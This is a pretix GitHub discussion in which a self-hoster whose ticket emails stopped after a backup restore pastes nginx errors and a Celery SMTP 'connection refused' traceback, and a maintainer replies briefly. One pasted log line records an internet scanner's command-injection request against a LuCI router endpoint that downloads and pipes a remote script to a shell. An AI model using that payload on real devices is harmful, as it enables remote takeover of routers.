### DISCUSSION TITLE
[error] 542#542: *1900 connect() failed (111: Connection refused) while connecting to upstream

### DISCUSSION THREAD

**Discussion by Nebelfuchs** [pretix/pretix#4522] [Q&A]
Hi all,
our server wasn't reachable yesterday morning so I had to restore our backup from Friday evening. At first it looked like everything was working again - our pretix website and backend are both accessible and people can order tickets. However no mails are sent out and mail.log is completely empty. I looked into the nginx logs and I get a ton of errors there:

2024/10/13 10:42:54 [error] 542#542: *1900 connect() failed (111: Connection refused) while connecting to upstream, client: 5.253.115.106, server: tickets.musicalklasse.de, request: "GET /control/event/musicalklasse/KHL/orders/ HTTP/1.1", upstream: "http://[::1]:8345/control/event/musicalklasse/KHL/orders/", host: "tickets.musicalklasse.de", referrer: "https://tickets.musicalklasse.de/"
2024/10/13 10:43:15 [error] 542#542: *1900 connect() failed (111: Connection refused) while connecting to upstream, client: 5.253.115.106, server: tickets.musicalklasse.de, request: "GET /control/event/musicalklasse/KHL/orders/VJWWM/ HTTP/1.1", upstream: "http://[::1]:8345/control/event/musicalklasse/KHL/orders/VJWWM/", host: "tickets.musicalklasse.de", referrer: "https://tickets.musicalklasse.de/"
2024/10/13 10:43:28 [error] 542#542: *1949 connect() failed (111: Connection refused) while connecting to upstream, client: 172.17.0.3, server: tickets.musicalklasse.de, request: "GET /media/pub/thumbs/2b4f9b08d0215f6f656bc3c21ed88b95.600_x5000.png HTTP/1.1", upstream: "http://[::1]:8345/media/pub/thumbs/2b4f9b08d0215f6f656bc3c21ed88b95.600_x5000.png", host: "tickets.musicalklasse.de"
2024/10/13 10:44:11 [error] 542#542: *1954 connect() failed (111: Connection refused) while connecting to upstream, client: 2003:c4:e70a:6500:e977:1b0e:4281:7673, server: tickets.musicalklasse.de, request: "POST /musicalklasse/KHL/checkout/customer/? HTTP/1.1", upstream: "http://[::1]:8345/musicalklasse/KHL/checkout/customer/?", host: "tickets.musicalklasse.de", referrer: "https://tickets.musicalklasse.de/"
2024/10/13 10:44:31 [error] 542#542: *1961 connect() failed (111: Connection refused) while connecting to upstream, client: 5.253.115.106, server: tickets.musicalklasse.de, request: "GET /control/event/musicalklasse/KHL/ HTTP/1.1", upstream: "http://[::1]:8345/control/event/musicalklasse/KHL/", host: "tickets.musicalklasse.de", referrer: "https://tickets.musicalklasse.de/"
2024/10/13 10:45:00 [error] 542#542: *1963 connect() failed (111: Connection refused) while connecting to upstream, client: 5.253.115.106, server: tickets.musicalklasse.de, request: "GET /control/event/musicalklasse/KHL/orders/ HTTP/1.1", upstream: "http://[::1]:8345/control/event/musicalklasse/KHL/orders/", host: "tickets.musicalklasse.de", referrer: "https://tickets.musicalklasse.de/"
2024/10/13 10:45:21 [error] 542#542: *1963 connect() failed (111: Connection refused) while connecting to upstream, client: 5.253.115.106, server: tickets.musicalklasse.de, request: "GET /control/widgets.json HTTP/1.1", upstream: "http://[::1]:8345/control/widgets.json", host: "tickets.musicalklasse.de", referrer: "https://tickets.musicalklasse.de/"
2024/10/13 10:45:48 [error] 542#542: *1983 connect() failed (111: Connection refused) while connecting to upstream, client: 2003:c4:e70a:6500:e977:1b0e:4281:7673, server: tickets.musicalklasse.de, request: "GET /static/CACHE/js/walletdetection.3dad028ed09e.js HTTP/1.1", upstream: "http://[::1]:8345/static/CACHE/js/walletdetection.3dad028ed09e.js", host: "tickets.musicalklasse.de", referrer: "https://tickets.musicalklasse.de/"
2024/10/13 10:50:21 [error] 542#542: *1990 connect() failed (111: Connection refused) while connecting to upstream, client: 2003:c4:e70a:6500:e977:1b0e:4281:7673, server: tickets.musicalklasse.de, request: "GET /musicalklasse/KHL/checkout/confirm/ HTTP/1.1", upstream: "http://[::1]:8345/musicalklasse/KHL/checkout/confirm/", host: "tickets.musicalklasse.de", referrer: "https://tickets.musicalklasse.de/"
2024/10/13 10:50:40 [error] 542#542: *1990 connect() failed (111: Connection refused) while connecting to upstream, client: 2003:c4:e70a:6500:e977:1b0e:4281:7673, server: tickets.musicalklasse.de, request: "GET /musicalklasse/KHL/checkout/confirm/?async_id=4bfa9f8c-4211-417e-99e6-4b8800a19443&ajax=1 HTTP/1.1", upstream: "http://[::1]:8345/musicalklasse/KHL/checkout/confirm/?async_id=4bfa9f8c-4211-417e-99e6-4b8800a19443&ajax=1", host: "tickets.musicalklasse.de", referrer: "https://tickets.musicalklasse.de/"
2024/10/13 10:50:54 [error] 542#542: *2008 connect() failed (111: Connection refused) while connecting to upstream, client: 5.253.115.106, server: tickets.musicalklasse.de, request: "GET /control/event/musicalklasse/KHL/widgets.json HTTP/1.1", upstream: "http://[::1]:8345/control/event/musicalklasse/KHL/widgets.json", host: "tickets.musicalklasse.de", referrer: "https://tickets.musicalklasse.de/"
2024/10/13 10:51:30 [error] 542#542: *2010 connect() failed (111: Connection refused) while connecting to upstream, client: 5.253.115.106, server: tickets.musicalklasse.de, request: "GET /control/event/musicalklasse/KHL/orders/QFMTD/ HTTP/1.1", upstream: "http://[::1]:8345/control/event/musicalklasse/KHL/orders/QFMTD/", host: "tickets.musicalklasse.de", referrer: "https://tickets.musicalklasse.de/"
2024/10/13 10:51:49 [error] 542#542: *2025 connect() failed (111: Connection refused) while connecting to upstream, client: 172.17.0.3, server: tickets.musicalklasse.de, request: "GET /media/pub/thumbs/2b4f9b08d0215f6f656bc3c21ed88b95.600_x5000.png HTTP/1.1", upstream: "http://[::1]:8345/media/pub/thumbs/2b4f9b08d0215f6f656bc3c21ed88b95.600_x5000.png", host: "tickets.musicalklasse.de"
2024/10/13 10:52:24 [error] 542#542: *2033 connect() failed (111: Connection refused) while connecting to upstream, client: 172.17.0.3, server: tickets.musicalklasse.de, request: "GET /media/pub/thumbs/2b4f9b08d0215f6f656bc3c21ed88b95.600_x5000.png HTTP/1.1", upstream: "http://[::1]:8345/media/pub/thumbs/2b4f9b08d0215f6f656bc3c21ed88b95.600_x5000.png", host: "tickets.musicalklasse.de"
2024/10/13 10:56:27 [error] 542#542: *2042 connect() failed (111: Connection refused) while connecting to upstream, client: 45.84.89.2, server: localhost, request: "GET / HTTP/1.1", upstream: "http://[::1]:8345/", host: "85.214.223.178"
2024/10/13 10:57:30 [error] 542#542: *2049 connect() failed (111: Connection refused) while connecting to upstream, client: 185.224.128.67, server: localhost, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.31%2Ft%7Csh%3B%60) HTTP/1.1", upstream: "http://[::1]:8345/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.31%2Ft%7Csh%3B%60)", host: "85.214.223.178:80"

Any pointing in the right direction would be greatly appreciated..

**Comment by raphaelm** [comment]
The nginx logs are certainly unrelated to email sending.

For the email sending, is your pretix-worker running correctly? Does it output any errors?

**Reply by Nebelfuchs** [reply]
Thanks - I do have errors in docker logs pretix:

[2024-10-13 08:55:23,763: ERROR/ForkPoolWorker-1] Task pretix.base.services.mail.mail_send_task[faf7e5c9-36e7-4416-a3ff-3244afd8c81c] raised unexpected: ConnectionRefusedError(111, 'Connection refused')
Traceback (most recent call last):
  File "/pretix/src/pretix/base/services/mail.py", line 619, in mail_send_task
    self.retry(max_retries=5, countdown=[10, 30, 60, 300, 900, 900][self.request.retries])
  File "/usr/local/lib/python3.11/site-packages/celery/app/task.py", line 737, in retry
    raise self.MaxRetriesExceededError(
celery.exceptions.MaxRetriesExceededError: Can't retry pretix.base.services.mail.mail_send_task[faf7e5c9-36e7-4416-a3ff-3244afd8c81c] args:() kwargs:{'to':
During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.11/site-packages/celery/app/trace.py", line 453, in trace_task
    R = retval = fun(*args, **kwargs)
                 ^^^^^^^^^^^^^^^^^^^^
  File "/pretix/src/pretix/base/services/tasks.py", line 62, in __call__
    ret = super().__call__(*args, **kwargs)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/site-packages/celery/app/trace.py", line 736, in __protected_call__
    return self.run(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/pretix/src/pretix/base/services/mail.py", line 631, in mail_send_task
    raise e
  File "/pretix/src/pretix/base/services/mail.py", line 533, in mail_send_task
    backend.send_messages([email])
  File "/usr/local/lib/python3.11/site-packages/django/core/mail/backends/smtp.py", line 127, in send_messages
    new_conn_created = self.open()
                       ^^^^^^^^^^^
  File "/usr/local/lib/python3.11/site-packages/django/core/mail/backends/smtp.py", line 85, in open
    self.connection = self.connection_class(
                      ^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/smtplib.py", line 255, in __init__
    (code, msg) = self.connect(host, port)
                  ^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/smtplib.py", line 341, in connect
    self.sock = self._get_socket(host, port, self.timeout)
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/smtplib.py", line 312, in _get_socket
    return socket.create_connection((host, port), timeout,
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/socket.py", line 863, in create_connection
    raise exceptions[0]
  File "/usr/local/lib/python3.11/socket.py", line 848, in create_connection
    sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused
WARNING 2024-10-13 08:56:27,529 django.request log Bad Request: /
WARNING 2024-10-13 08:56:27,529 django.request log Bad Request: /
[2024-10-13 08:57:21,220: INFO/MainProcess] Task pretix.base.services.mail.mail_send_task[ac3736c7-587c-4d79-8fa5-429939f428b5] received
[2024-10-13 08:57:21,224: INFO/ForkPoolWorker-1] Task pretix.base.services.mail.mail_send_task[ac3736c7-587c-4d79-8fa5-429939f428b5] retry: Retry in 900s
[2024-10-13 08:57:24,984: INFO/MainProcess] Task pretix.base.services.mail.mail_send_task[80e45422-7875-45c5-abaa-f86d218c3379] received
[2024-10-13 08:57:24,987: INFO/ForkPoolWorker-1] Task pretix.base.services.mail.mail_send_task[80e45422-7875-45c5-abaa-f86d218c3379] retry: Retry in 900s
WARNING 2024-10-13 08:57:30,548 django.request log Bad Request: /cgi-bin/luci/;stok=/locale
WARNING 2024-10-13 08:57:30,548 django.request log Bad Request: /cgi-bin/luci/;stok=/locale
WARNING 2024-10-13 08:57:41,633 django.request log Bad Request: /cgi-bin/luci/;stok=/locale
WARNING 2024-10-13 08:57:41,633 django.request log Bad Request: /cgi-bin/luci/;stok=/locale
[2024-10-13 08:58:31,088: INFO/MainProcess] Task pretix.base.services.mail.mail_send_task[0072bb33-72d1-44ae-8a3f-393b44a7aba9] received
[2024-10-13 08:58:31,096: INFO/ForkPoolWorker-1] Task pretix.base.services.mail.mail_send_task[0072bb33-72d1-44ae-8a3f-393b44a7aba9] retry: Retry in 900s
WARNING 2024-10-13 08:59:32,053 django.request log Bad Request: /
WARNING 2024-10-13 08:59:32,053 django.request log Bad Request: /
